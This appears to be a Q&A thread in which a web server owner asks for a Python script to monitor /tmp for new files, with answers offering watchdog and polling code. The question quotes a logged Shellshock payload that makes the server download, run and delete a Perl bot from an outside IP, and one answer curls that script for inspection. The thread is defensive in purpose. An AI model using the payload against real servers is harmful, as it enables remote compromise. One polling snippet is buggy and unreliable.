A python script to monitor a directory for new files

Question

Similar questions have been asked but they either did not work for me or I failed to understand the answers.

I run Apache2 webserver and host a few petty personal sites. I am being cyberstalked, or someone is attempting to hack me.

The Apache2 access log shows

195.154.80.205 - - [05/Nov/2015:09:57:09 +0000] "GET /info.cgi HTTP/1.1" 404 464 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\r\n\r\nXSUCCESS!\";system(\"wget http://190.186.76.252/cox.pl -O /tmp/cox.pl;curl -O /tmp/cox.pl http://190.186.76.252/cox.pl;perl /tmp/cox.pl;rm -rf /tmp/cox.pl*\");'"

which is clearly attempting (over and over again in my logs) to force my server to download 'cox.pl' then run 'cox.pl' then remove 'cox.pl'.

I really want to know what is in cox.pl which could be a modified version of Cox-Data-Usage which is there on github.

I would like a script that will constantly monitor my /tmp folder, and when a new file is added then copy that file to another directory for me to see what it is doing, or attempting to do at least.

I know I could deny access etc. but I want to find out what these hackers are trying to do and see if I can gather intel about them.

Answer 1

The solution to the question wouldn't lie in a python script, this is more of a security issue for the likes of Fail2ban or similar to handle, but there is a way to monitor a directory for changes using Python Watchdog. (pip install watchdog)

Taken from: https://pythonhosted.org/watchdog/quickstart.html#a-simple-example

import sys
import time
import logging
from watchdog.observers import Observer
from watchdog.events import LoggingEventHandler

if __name__ == "__main__":
    logging.basicConfig(level=logging.INFO,
                        format='%(asctime)s - %(message)s',
                        datefmt='%Y-%m-%d %H:%M:%S')
    path = sys.argv[1] if len(sys.argv) > 1 else '.'
    event_handler = LoggingEventHandler()
    observer = Observer()
    observer.schedule(event_handler, path, recursive=True)
    observer.start()
    try:
        while True:
            time.sleep(1)
    except KeyboardInterrupt:
        observer.stop()
    observer.join()

This will log all changes, (it can be configured for just file creation). If you want to rename new files to something else, you first need to know if the file is free or any modifications will fail, i.e it's not finished downloading/creation. That issue can mean that a call to that file can come before you've moved or renamed it programmatically. That's why this isn't a solution.

Answer 2

I got some solution,

solution 1 (CPU usage: 27.9% approx= 30%):

path_to_watch = "your/path"
print('Your folder path is"',path,'"')
before = dict ([(f, None) for f in os.listdir (path_to_watch)])
while 1:
        after = dict ([(f, None) for f in os.listdir (path_to_watch)])
        added = [f for f in after if not f in before]
        if added:
                print("Added: ", ", ".join (added))
                break
        else:
             before = after

I have edited the code, the orginal code is available at http://timgolden.me.uk/python/win32_how_do_i/watch_directory_for_changes.html

The original code was made in python 2x so you need to convert it in python 3.

NOTE:-

WHEN EVER YOU ADD ANY FILE IN PATH, IT PRINTS THE TEXT AND BREAKS, AND IF NO FILES ARE ADDED THEN IT WOULD CONTINUE TO RUN.

Solution 2 (CPU usage: 23.4 approx=20%)

    import os
path=r'C:\Users\Faraaz Anas Ammaar\Documents\Programming\Python\Eye-Daemon'
b=os.listdir(path)
path_len_org=len(b)
def file_check():
    while 1:
        b=os.listdir(path)
        path_len_final=len(b)
        if path_len_org<path_len_final:
            return "A file is added"    
        elif path_len_org>path_len_final:
            return "A file is removed"
        else:
            pass
file_check()

Answer 3

The script in question can be easily downloaded, it contains ShellBOT by: devil__ so... guess ;-)

You could use tutorial_notifier.py from pyinotify, but there's no need for this particular case. Just do

curl http://190.186.76.252/cox.pl -o cox.pl.txt
less cox.pl.txt

to check the script.

It looks like a good suite of hacks for Linux 2.4.17 - 2.6.17 and maybe BSD*, not that harmless to me, IRC related. It has nothing to do with Cox-Data-Usage.